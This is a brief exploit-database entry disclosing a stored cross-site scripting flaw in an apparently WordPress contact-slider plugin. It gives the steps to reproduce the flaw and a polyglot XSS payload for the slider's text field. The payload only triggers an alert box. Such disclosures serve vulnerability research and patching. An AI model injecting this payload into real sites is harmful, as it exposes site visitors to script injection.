Share
## https://sploitus.com/exploit?id=WPEX-ID:CD2FD6CD-A839-4DE8-AF28-B5134873C40E
Create/edit a Contact slider and put the payload below in the "Text to display" option:

<p>';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT></p>

The XSS will be triggered in page/post where the Slider is embed, of all frontend pages if the "display on all pages" option is ticked in the slider